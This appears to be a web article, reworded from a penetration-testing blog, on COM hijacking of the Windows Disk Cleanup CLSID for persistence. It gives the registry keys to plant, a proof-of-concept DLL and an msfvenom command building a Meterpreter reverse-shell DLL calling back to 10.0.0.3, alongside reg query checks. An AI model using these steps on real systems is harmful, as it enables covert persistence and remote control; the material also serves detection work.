Windows Disk Cleanup Risks: A Step-by-Step Guide to Staying Safe (2024)

COM The way that the Disk Cleanup application, cleanmgr.exe, searches the Windows registry for particular DLLs based on their CLSIDs (Class Identifiers) is exploited via hijacking. Through the exploitation of the CLSID linked to Disk Cleanup, aggressors can reroute the program to execute their own malicious code instead of the intended functionality.

Therefore, while Disk Cleanup remains a functional tool for managing disk space, it’s crucial to be aware of this potential security risk and implement appropriate security measures to mitigate it.

Think of the registry on your computer as a huge closet that contains all of the software instructions. Disk Cleanup uses certain “keys” in this space to locate cache and temporary files that you can erase without risk.

The wrinkle is that an attacker can construct their own “fake keys” to deceive Disk Cleanup into running harmful code rather than the authorized cleanup procedure if they have admin rights (such as a master key to the storage area).

These “fake keys” come in the form of registry entries like

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\<registry-key-CLSID>HKCU\Software\Classes\CLSID\{arbitrary-CLSID}.

Thankfully, you can check for these suspicious entries using the command reg query

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /s.

Downloaded Program Files: This category for removing temporary files is linked to the registry key with the unique identifier {8369AB20-56C9-11D0-94E8-00AA0059CE02}

.

Downloaded Program Files CLSID

The category we mentioned earlier, “Downloaded Program Files,” is associated with a specific registry key. This key acts like a unique identifier within the Windows registry, similar to a name tag in a filing cabinet. You can find this key using the technical code reg query "HKEY_CLASSES_ROOT\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s.

The following code can be used as a proof of concept to display a message box when the disk clean-up utility is initiated.

#include "pch.h"
#include "windows.h"
#include "WinUser.h"



BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {     case DLL_PROCESS_ATTACH:
        MessageBox(NULL, (LPCWSTR)L"Visit pentestlab.blog",(LPCWSTR)L"pentestlab", MB_OK);
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

To hijack a specific program (represented by its CLSID), attackers need to create a new entry in the Windows registry under:

• Location: HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID
• Content: This entry will have a subkey named InprocServer32.
• Target: The InprocServer32 subkey will point to the path of a malicious DLL (Dynamic Link Library) file chosen by the attacker.

Checking for Hijacked CLSIDs:

The command:

reg query "HKCU\Software\Classes\CLSID\{8369AB20-56C9-11D0-94E8-00AA0059CE02}" /s

acts like a search function within the Windows registry. It specifically looks for a unique identifier (\{8369AB20-56C9-11D0-94E8-00AA0059CE02}) associated with a program that could be potentially hijacked. If this key has been altered to point to a malicious DLL file, it might indicate an attempt to compromise Disk Cleanup.

Running Disk Cleanup:

The text lists different ways to run cleanmgr.exe, the program for Disk Cleanup. However, don’t attempt to run these commands unless instructed by a security professional.

The text lists various ways to run the Disk Cleanup program (cleanmgr.exe), including:

• cleanmgr.exe: Launches the Disk Cleanup program with the graphical user interface.
• cleanmgr.exe /autoclean: Runs Disk Cleanup silently without displaying the user interface.
• cleanmgr.exe /setup: (Optional) May be used for specific configuration purposes related to Disk Cleanup.
• cleanmgr.exe /cleanup: (Optional) May initiate the cleanup process directly without user interaction.

Additional Notes:

• The /autoclean option runs Disk Cleanup silently without a user interface.
• Disk Cleanup could be combined with other system features like scheduled tasks to run automatically at specific times. Do not attempt to implement these functionalities without proper knowledge and guidance.
• Never modify the registry or run unfamiliar commands without proper expertise. Doing so can severely harm your computer.
• If you suspect any suspicious activity on your computer, seek immediate assistance from a security professional.

Persistence Disk Clean-up – MessageBox

Using msfvenom for Demonstration (Caution Advised)

While the Metasploit Framework’s msfvenom utility can automatically generate DLL files, it’s crucial to understand that this method is not recommended for real-world red team exercises. Directly generated payloads are likely to be detected by security solutions.

Let’s break down the example command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.3 LPORT=4444 -f dll -o pentestlab.dll

• -p windows/x64/meterpreter/reverse_tcp: Specifies the payload type (in this case, a Windows 64-bit Meterpreter reverse TCP shell)
• LHOST=10.0.0.3 LPORT=4444: Configures the payload to connect back to the attacker’s machine on the IP address 10.0.0.3 and port 4444.
• -f dll: Sets the output format to a DLL file.
• -o pentestlab.dll: Names the output file “pentestlab.dll”

Once the disk clean-up process is initiated, the code will be executed and establish a meterpreter session with the compromised host.

References

1. https://cocomelonc.github.io/persistence/2022/11/16/malware-pers-19.html
2. https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/